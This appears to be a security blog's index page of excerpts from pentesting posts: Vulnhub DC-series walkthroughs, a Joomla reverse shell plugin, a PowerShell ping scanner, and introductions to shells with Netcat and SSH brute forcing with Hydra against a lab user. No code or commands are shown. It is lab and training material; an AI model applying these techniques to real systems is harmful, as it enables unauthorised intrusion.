I took a brief look at DC: 5 and I can read into the file system but it's definitely not obvious taking the next step.  Meanwhile, I just wrapped up DC: 3 and according to part of the description:

"For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily)."

It didn't take long but it did take more than 20 minutes because I decided to learn how to write a Joomla reverse shell plugin.  When I wrote the WordPress Plugin : Reverse Shell, the thought occurred to me to do the same for Joomla but I didn't bother.  Given the easier target, it seemed like a good time.  And I learned something and that's what really matters.

Read more: Vulnhub DC: 3 Walkthrough

A bunch of new releases on Vulnhub over the last few weeks.  Looks like two of the main contributors dumped quite a few new boxes and the one maker in particular has produced some very challenging boxes.  I'm torn between wanting to adhere to my strict allotted time and wanting to get sucked down a rabbit hole.  While I ponder that decision, I'll take a look at DC-6. 

Kicking off with an Nmap scan:

Read more: Vulnhub DC: 6 Walkthrough

I don't do a lot of brute force attacks because other than some low-end products that allow for that kind of thing, most real world devices, services, etc., won't tolerate it.  When I do end up using brute force, it's either with Hydra or Burp but with write-ups, I shy away from pay products only because these tools might not be available to everyone.  Today, I used Hydra, I learned something new, and that makes this write-up worth it or more than one level.

Continuing on with the DC series of boxes, our next target is DC: 4

Kicking off with an Nmap scan:

Read more: Vulnhub DC: 4 Walkthrough

I own most, if not all, of the Hak5 gear because I like to see how each product works and possibly come up with a way to prevent the attack. 

The other day I received an email from them, went to their website, and was reminded of Bash Bunny.  I then wondered what it would take to make a Bash Bunny script to ping scan the network.  Then I wondered what it would take to do that in PowerShell, eliminating the Bunny from the equstion.  And that's where this post is headed.

In Linux, I might not necessarily know the exact syntax for what I want to do but I probably have a good idea as to which commands I can use to do it.  I know that from ifconfig, I can get the IP address.  And with various other commands like sed, awk, cut, head, and tail, I can isolate to what I want exactly. 

The following one-liner parses ifconfig for the subnet:

Read more: PowerShell Pinger

Up until now, we've discussed using Nmap to scan for open ports, web fuzzers that enumerate directories and files, hash cracking, and we've even taken it a little further toward the victim with brute force attacks where we were able to login to a web application.  But even with the successful login to a web application, I feel like we're sort of just pecking around the perimeter.  Shells take us to that next level where we're able to pierce the skin and get below the surface.

This can be a tricky subject to wrap ones mind around so rather than jumping into the idea of shells immediately, let's start off with leveraging a tool, Netcat, for two way communication.  

To better help (I hope!) keep this straight, I've colored each side.

Read more: Pentesting 101: Shells

I assume when I say "Brute Force Attack" that we all know what I'm talking about.  Just in case -- let's pretend we have a lock, a pocket full of keys, and we try each key in the lock until we exhaust the collection of keys or we are able to open the lock.  Now let's say the lock is a login, the pocket full of keys, the wordlist, and the act of trying the keys is some sort of application to perform the task.

I'm not sure that helps or hurts so I'll move on to what we're attempting to do in our first example. 

I've setup a user on an Ubutnu server and that server has SSH access enabled.  Our victim user is:  bforce and the password is:  123456

The first tool we're going to use is Hydra.  

Read more: Pentesting 101: Brute Force Attack